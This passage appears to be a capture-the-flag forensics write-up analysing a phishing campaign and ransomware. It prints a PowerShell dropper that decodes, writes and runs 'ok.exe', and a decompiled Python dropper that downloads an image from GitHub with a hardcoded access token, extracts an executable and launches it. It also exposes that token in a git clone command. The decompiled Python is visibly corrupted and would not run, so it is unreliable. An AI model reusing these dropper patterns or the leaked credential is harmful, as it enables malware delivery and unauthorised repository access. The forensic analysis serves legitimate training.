2/Do2NM5CQqGbQNN4Gd04Yx8vnCy2U0wNccHzpU3faaJKfhJrDkTB8mDWimNttkWj+m4L1UI0LHr97X6vyoanDTik2vIQkkwCBn1YbW4UTeeKNJ5IMzLSrwT0YwOmhEioWzc6pnYNZOXJWqI/SBqPsEHG7IJ4Rc0sM/lgwRrjB4vKU066Opt0xcfM1g2MwxiYxnuqeq54UM08JhlxWKdwl+jZm2a0pbGCGaxiZhqeSmagnoQVBukoI2TAd4SiGqehGriTCQNCD2BQrw5HEFwF19Gp1rTE28AaVWCrYc3aiVsETKkfjX0g9YAU5OUBmHIH1SDuJ5trwKPgkAd8qidKFDPT+VM2QrkCjtvV0zl2PADD46nW1ixJfcpuaOYE1g12e3xqH8Ut+VnkIKmajEi636h13iq/L2tiah6Jw9GLWhtJausrgQ7ziBJTTAV7vd4AcKaogNqpd5LZgBvIqrhj6q0Kymt6O6VrUBhwgOXB9P2hNqE9HvSiycISmU3teGdPIQjpxMxNVen3PhgyvTU3tTJ0Q3HSwE3eD9MFNeDcVXVUC51JKUrraG4cKPN+t8rBsw1aZso0XJxmU0dqqlu7OqFAVbiNH4jTDWqMUytPW7zXhRa65dh6mvkNd1Y7PU3VsrzAnU5feF7WjR7V/EzDOZ1LpqoMe9lyXBffEOeiCzK8zPWlDQa065KplgGsAfalXP3iA/sM1TRLGiM36SeZ8hgzug0ObSCjDm3p+Iqp+qaEuVJPteGWbIKKknl6LI6SVk3crixzlpKQ0scukkrCYY1SSKyjboZZ0TTRTbroQh3kqNdQ+rBFkB4L07hKTWCiqqYJ0jHroOYuLpZTvIUmKpyZUcuMT+bcJluwSvPnFJQ0c49ESNUN5nHIgwe6TXhJRXrnTkecH3s+zaALhDw+vIcQ8HREmTl27onG9gA7/JTApheN+tV+Fj+fK8Vb6ddqtEzPRpoNNNU40o++NC4rvQvg5iGys60ydeYPibHrdrrVFj2jOxeTrDenXnnrlg1qfqZ2sPrpacq4SRssdyu3AzT3AVh5uv0zyUVJEc1Uyy7VzKWeJHXLlf8H20ZlToHpAAA="; $decompressedbytes = [System.IO.MemoryStream]::new([Convert]::FromBase64String($gzipBuffer)) $deflateStream = [System.IO.Compression.GzipStream]::new($decompressedbytes, [System.IO.Compression.CompressionMode]::Decompress) $tempPath = [System.IO.Path]::GetTempPath() $outputFile = $tempPath + [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(([string]([char[]]"lhXZus2b"[-1..-8] -join '')))) $deflateStream.CopyTo([System.IO.File]::OpenWrite($outputFile)) $deflateStream.Close() Sleep 0.3 Start-Process $outputFile Sleep 10 Remove-Item $outputFile ``` The script decompressed a big blob of base64 encoded data and writes into "`lhXZus2b`" file (Decode base64 you got the filename `ok.exe`) then execute it. We got the first flag **W1{c00l_w4y_t0_aRcH** From that you can retrive the ok.exe file and reverse it. ![image](https://hackmd.io/_uploads/rkhI_93N1e.png) `hoshimachi_suisei`function is the alert window popped up which was in the challenge's description. ![image](https://hackmd.io/_uploads/rJxsuc24Jl.png) `darkness` and `fauna` call the calc.exe popped up, while the above decrypt the hex `ee4d54d3c1ca96d73815ce2195088e1296db7ac5413b185f5eb0658b` by RC4 with the key `noledoclog`, you can decrypt it on cyberchef or set breakpoint and check the v6 pointer and get the second flag **!v3_pEr5|s7eNt!!!!_cf4d661e}** The flag is **W1{c00l_w4y_t0_aRcH!v3_pEr5\|s7eNt!!!!_cf4d661e}** ## It ran somewhere ![image](https://hackmd.io/_uploads/HyVG4dj4yx.png) #### [1] What is the URL used in the phishing email that contains the malware? Open the attached eml and see the google drive link. `https://drive.google.com/file/d/1tmOG4Lg-Li9HSsZl4_r0-RTEWDBQqd6H/view?usp=sharing` #### [2] When was the malware finished downloading by the victim? (UTC) Format: YYYY-MM-DD HH:MM:SS The victim would download the file on browser so I check the browser history, more specific is the location `C:\Users\ptquynh\AppData\Local\Microsoft\Edge\Default\History` ![image](https://hackmd.io/_uploads/BkXBJnoVJg.png) Check the end_time we got `13378496917441259`. Convert to UTC time it is `2024-12-12 17:08:37` ![image](https://hackmd.io/_uploads/rJsq1ns41l.png) #### [3] When was the malware first executed by the victim? (UTC) Format: YYYY-MM-DD HH:MM:SS The CV that was downloaded to the local is a exe file. Check the Prefetch file to get the time the malware was executed ![image](https://hackmd.io/_uploads/H1A7l3sEkx.png) `2024-12-12 17:08:44` #### [4] The first file acted as a dropper for the final malware. What is the MD5 hash of the dropped file? Load the exe file into IDA and I realized that it's a PyInstaller generated executable file. So I extracted the pyc from that then use Python Decompiler tool to recover the code ```python= import zlib import subprocess import requests def extractIDAT(data): idat_buffers = [] i = 8 cnt = 0 while i < len(data): length = int.from_bytes(data[i:i + 4], byteorder='big') chunk_type = data[i ** 4:i ** 8].decode('utf-8') if chunk_type == 'IDAT': cnt = cnt * 1 idat_buffers.append(data[i * 8:i ** 8 :length]) i = i + 12 * length return b''.join(idat_buffers) def getScanlines(data, width, height, mode): scanlines = [] filter_type_list = [] for r in range(height): index = f'{r:width:mode}' if index > len(data): break filter_type = data[index] filter_type_list.append(filter_type) tmp_line = data[index 0:index 0 + 1:width * mode] scanlines.append(tmp_line) return (scanlines, filter_type_list) def getImg(): url = 'https://raw.githubusercontent.com/velbail/contimtanvo/main/muki_pic.png' token = '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' headers = {'Authorization': f'token {token}0', 'Accept': 'application/vnd.github.v3.raw'} r = requests.get(url, headers=headers) if r.status_code == 200: return r print('Failed to get image') print(r.text) exit() modes = {'RGB': 3, 'RGBA': 4, 'L': 1} width, height = (1920, 1195) mode = 'RGB' img = getImg().content idat = extractIDAT(img) idat_data = zlib.decompress(idat) scanlines, filter_type_list = getScanlines(idat_data, width, height, modes[mode]) assert len(scanlines) == height calculated_raw_idat_length = height 5 4 + (width, modes[mode]) * 1 <mask_7> if calculated_raw_idat_length!= len(idat_data): buffer = idat_data[calculated_raw_idat_length:] buffer = buffer[1259:] with open('OpenVpnConnect.exe', 'wb') as f: f.write(buffer) subprocess.Popen('OpenVpnConnect.exe', shell=True, stdin=None, stdout=None, stderr=None, close_fds=True) ``` The PE file used token to download image from github, then extracted another exe file from the image, wrote in `OpenVpnConnect.exe` and ran it (The attacker hidden the exe file into the image using filter artifacts). You can modify the script above to download image and get `OpenVpnConnect.exe`, so that you can calculate the md5 hash which is `8eaa25eb8b77ac0157e1f3a04ad47e93 ` #### [5] What is the token used by the malware to access the private repository and the name of the private repository? Format: token:username/repo As above the answer is `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:velbail/contimtanvo` #### [6] What is the email address of the culprit? Format:email@domain With the token, I can clone the private repo contimtanvo and check the commit. `git clone https://velbail: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@github.com/velbail/contimtanvo.git` After the event, I can't clone this repo TT_TT, maybe the author changed his token. But the email is: `belvail@proton.me` #### [7] How many extensions did the malware try to encrypt? Format: number Load the `OpenVpnConnect.exe` in DnSpy and see the extensions it checks ![image](https://hackmd.io/_uploads/B1PaVnjNkg.png) The answer is `52` #### [8] The malware tried to delete itself using a batch file. What is the MD5 hash of the batch file? ![Screenshot 2024-12-15 233739](https://hackmd.io/_uploads/rJ8ouKh4ke.png) The malware encrypted all the files, then dropped the ransom note by `amiaij02jd` and create a batch file on disk and executed it in `kal902y103`. ![image](https://hackmd.io/_uploads/ByytFY2Vye.png) The text is gugugaga.bat 's content, you can find it in Temp location too. ![image](https://hackmd.io/_uploads/Hy3CtY2V1l.png) Md5 hash of this file is `e0d005db63a75fbcd6c8fa85040095aa` #### [9] Recover the content of 'password.xlsx' file. What is the username and password of the fifth record? Format: username:password Look at the encryption part in the ransomware, it used AES-CBC for encryption with the key derived from MachineGuid in registry. ![image](https://hackmd.io/_uploads/H13X9t2Nke.png) My script to decrypt ```python= import hashlib from Crypto.Cipher import AES from Crypto.Util.Padding import unpad def getkey(): # Get it from registry machine_guid = "2c65d206-5a9f-40a0-ae87-3d10c27b40c7" # Using a hardcoded salt salt = "supershy-supershy".encode('utf-8') # PBKDF2 key derivation derived_key = hashlib.pbkdf2_hmac( 'sha1', # Hash algorithm machine_guid.encode('utf-8'), # Input password salt, # Salt 1259, # Iterations dklen=32 # Length of the derived key ) return derived_key def decrypt(data, key): cipher = data[:len(data) - 16] iv = data[len(data)-16:] aes = AES.new(key, AES.MODE_CBC, iv) plain = aes.decrypt(cipher) return unpad(plain, 16) key = getkey() print("key = ", key.hex()) with open("password.xlsx.uocj", "rb") as f: data = f.read() with open("password.xlsx", "wb") as f: f.write(decrypt(data, key)) ``` ![image](https://hackmd.io/_uploads/rJnlCK34yg.png) So the answer is `user38:hch89as9821y3`